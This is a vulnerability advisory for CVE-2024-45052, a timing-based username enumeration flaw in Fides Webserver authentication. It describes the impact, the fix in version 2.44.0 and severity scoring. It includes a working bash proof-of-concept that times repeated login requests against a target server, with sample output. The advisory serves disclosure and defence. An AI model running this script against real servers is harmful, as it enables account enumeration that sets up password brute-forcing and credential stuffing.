CVE-2024-45052
Timing-Based Username Enumeration Vulnerability in Fides Webserver Authentication
Description
A timing-based username enumeration vulnerability has been identified in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system. ### Impact This vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server's response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing. ### Patches The vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. ### Workarounds There are no workarounds. ### Proof of Concept 1. Create a valid user called `valid_user` on a remote Fides server. Ensure that there is no user on the server named `invalid_user`. Note that this vulnerability is not reproducible on a local deployment due to the extremely low latency of responses to login requests. 2. In a terminal run `export LOGIN_URL='https://example.com/api/v1/login'`, replacing `example.com` with your remote Fides server's domain or IP address. 3. In the same terminal run `exploit-poc.sh` (detailed below). 4. It's possible to distinguish between valid and invalid users based on the low latency (time difference) for invalid users. <details> <summary>Exploit PoC script</summary> ```bash #!/bin/bash # Function to test login and calculate average transfer times test_login(){ echo -e "\nTesting login for user: $1\n" total_diff=0 for (( i=1; i <= 20; ++i )) do echo -n "Attempt #$i: " resp=$(curl -w @- "$LOGIN_URL" \ -H 'content-type: application/json' \ --data-raw '{"username":"'$1'","password":"d3JvbmdwYXNzd29yZA=="}' \ -o /dev/null -s <<'EOF' { "pretransfer": %{time_pretransfer}, "starttransfer": %{time_starttransfer} } EOF ) pre=$(echo $resp | jq '.pretransfer') start=$(echo $resp | jq '.starttransfer') diff=$(echo "$start - $pre" | bc) # Accumulate total diff total_diff=$(echo "$total_diff + $diff" | bc) # Print the result of this iteration printf "Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\n" "$pre" "$start" "$diff" done # Calculate average diff avg_diff=$(echo "scale=4; $total_diff / 20" | bc) # Print average time echo -e "\nAverage Time Difference for $1: $avg_diff seconds\n" } # Ensure that LOGIN_URL is set if [ -z "$LOGIN_URL" ]; then echo "Error: LOGIN_URL environment variable is not set." exit 1 fi # Test valid and invalid users test_login valid_user test_login invalid_user ``` </details> <details> <summary>Sample script run</summary> ``` ~ ❯ ./exploit-poc.sh Testing login for user: valid_user Attempt #1: Pretransfer: 0.3006, Starttransfer: 0.7404, Diff: 0.4398 Attempt #2: Pretransfer: 0.2755, Starttransfer: 1.2506, Diff: 0.9751 Attempt #3: Pretransfer: 0.2595, Starttransfer: 0.7108, Diff: 0.4512 Attempt #4: Pretransfer: 0.2551, Starttransfer: 1.0483, Diff: 0.7932 Attempt #5: Pretransfer: 0.2553, Starttransfer: 0.6680, Diff: 0.4127 Attempt #6: Pretransfer: 0.2599, Starttransfer: 0.6712, Diff: 0.4113 Attempt #7: Pretransfer: 0.2518, Starttransfer: 0.6603, Diff: 0.4085 Attempt #8: Pretransfer: 0.2467, Starttransfer: 0.6812, Diff: 0.4344 Attempt #9: Pretransfer: 0.2502, Starttransfer: 0.8175, Diff: 0.5673 Attempt #10: Pretransfer: 0.2583, Starttransfer: 0.6904, Diff: 0.4321 Attempt #11: Pretransfer: 0.2573, Starttransfer: 0.6601, Diff: 0.4029 Attempt #12: Pretransfer: 0.2481, Starttransfer: 0.8495, Diff: 0.6014 Attempt #13: Pretransfer: 0.2487, Starttransfer: 0.6822, Diff: 0.4336 Attempt #14: Pretransfer: 0.2526, Starttransfer: 0.9728, Diff: 0.7201 Attempt #15: Pretransfer: 0.2573, Starttransfer: 0.9808, Diff: 0.7235 Attempt #16: Pretransfer: 0.2459, Starttransfer: 0.6536, Diff: 0.4078 Attempt #17: Pretransfer: 0.2508, Starttransfer: 0.9024, Diff: 0.6517 Attempt #18: Pretransfer: 0.2477, Starttransfer: 2.2049, Diff: 1.9572 Attempt #19: Pretransfer: 0.2523, Starttransfer: 2.1087, Diff: 1.8564 Attempt #20: Pretransfer: 0.2523, Starttransfer: 0.7308, Diff: 0.4785 Average Time Difference for valid_user: .6779 seconds Testing login for user: invalid_user Attempt #1: Pretransfer: 0.2496, Starttransfer: 0.4122, Diff: 0.1626 Attempt #2: Pretransfer: 0.2551, Starttransfer: 0.4049, Diff: 0.1498 Attempt #3: Pretransfer: 0.2480, Starttransfer: 0.6174, Diff: 0.3694 Attempt #4: Pretransfer: 0.2489, Starttransfer: 0.4611, Diff: 0.2122 Attempt #5: Pretransfer: 0.2513, Starttransfer: 0.4601, Diff: 0.2088 Attempt #6: Pretransfer: 0.2540, Starttransfer: 0.3946, Diff: 0.1406 Attempt #7: Pretransfer: 0.2504, Starttransfer: 0.9104, Diff: 0.6599 Attempt #8: Pretransfer: 0.2577, Starttransfer: 0.4095, Diff: 0.1518 Attempt #9: Pretransfer: 0.2497, Starttransfer: 0.3851, Diff: 0.1353 Attempt #10: Pretransfer: 0.2548, Starttransfer: 0.4024, Diff: 0.1476 Attempt #11: Pretransfer: 0.2559, Starttransfer: 0.4002, Diff: 0.1443 Attempt #12: Pretransfer: 0.2501, Starttransfer: 0.4075, Diff: 0.1573 Attempt #13: Pretransfer: 0.2560, Starttransfer: 0.3921, Diff: 0.1361 Attempt #14: Pretransfer: 0.2493, Starttransfer: 0.3933, Diff: 0.1440 Attempt #15: Pretransfer: 0.2493, Starttransfer: 0.3942, Diff: 0.1449 Attempt #16: Pretransfer: 0.2599, Starttransfer: 0.5111, Diff: 0.2512 Attempt #17: Pretransfer: 0.2455, Starttransfer: 0.4128, Diff: 0.1673 Attempt #18: Pretransfer: 0.2558, Starttransfer: 1.7535, Diff: 1.4977 Attempt #19: Pretransfer: 0.2515, Starttransfer: 1.4528, Diff: 1.2013 Attempt #20: Pretransfer: 0.2483, Starttransfer: 0.3893, Diff: 0.1410 Average Time Difference for invalid_user: .3161 seconds ~ ❯ ``` </details> ### Severity This vulnerability has been assigned a severity of LOW. Using CVSS v3.1 it could be scored as`AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (5.3 Medium/Moderate) or `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N` (0.0 None) depending on the Confidentiality impact metric used. In [Bugcrowd's vulnerability rating taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) it most likely be assigned a technical severity of P4 (Low) Broken Access Control (BAC) > Username/Email Enumeration > Non-Brute Force.